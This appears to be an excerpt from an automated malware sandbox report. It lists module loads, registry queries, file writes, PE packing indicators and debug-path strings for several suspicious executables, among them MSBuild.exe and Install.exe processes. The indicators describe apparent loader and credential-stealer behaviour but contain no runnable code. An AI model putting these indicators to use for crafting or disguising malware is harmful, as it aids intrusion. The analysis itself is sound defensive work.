Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Section loaded: apphelp.dll
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Section loaded: winmm.dll
Source: C:\Users\user\Documents\piratemamm\yqnvj2zXKAsCMyFmEDrQLSxi.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: mscoree.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: version.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wldp.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: profapi.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: dwrite.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: mswsock.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: sspicli.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: secur32.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: amsi.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: userenv.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: dpapi.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: rstrtmgr.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\Documents\piratemamm\bQnXcKn6ehLDJGqEStjbnSyC.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS80C5.tmp\Install.exe	Section loaded: sfc_os.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: webio.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: apphelp.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: winmm.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: userenv.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: profapi.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: netapi32.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: wkscli.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: netutils.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: samcli.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: samlib.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: rasadhlp.dll
Source: C:\Program Files (x86)\NetVoyager\nv.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: acgenral.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: msacm32.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: winmmbase.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: aclayers.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: sfc_os.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: drprov.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: ntlanman.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: davclnt.dll
Source: C:\Users\user\AppData\Local\Temp\7zS918E.tmp\Install.exe	Section loaded: davhlpr.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: powrprof.dll
Source: C:\Windows\System32\powercfg.exe	Section loaded: umpdc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wininet.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rstrtmgr.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncrypt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dbghelp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iertutil.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winhttp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: urlmon.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: srvcli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: netutils.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rasadhlp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: schannel.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mskeyprotect.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: msasn1.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: gpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ncryptsslp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sxs.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windowscodecs.dll

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{EA502722-A23D-11D1-A7D3-0000F87571E3}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

File written: C:\Windows\System32\GroupPolicy\gpt.ini

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Documents\piratemamm\eROo1ugNChgONSxoiS6DxyMi.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Static PE information: Virtual size of .text is bigger than: 0x100000

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Static PE information: Image base 0x140000000 > 0x60000000

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Static file information: File size 4467712 > 1048576

Source: 284ae9899ae53d03d27bd3f72892d843fe5bbecb097f5.exe

Static PE information: Raw size of .vmp/TC is bigger than: 0x100000 < 0x420400

Source:	Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: NjdbLPleIutA8FKI_S3fRztd.exe, NjdbLPleIutA8FKI_S3fRztd.exe, 0000000A.00000002.2963434256.0000000002000000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdb source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdbP source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: freebl3.pdbp source: NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2221257829.0000000004DD2000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.000000000983F000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009D6E000.00000004.00000800.00020000.00000000.sdmp, NoCZBiPwAcSyoDte_ne2sJt7.exe, 0000000B.00000002.2531878146.0000000009311000.00000004.00000800.00020000.00000000.sdmp
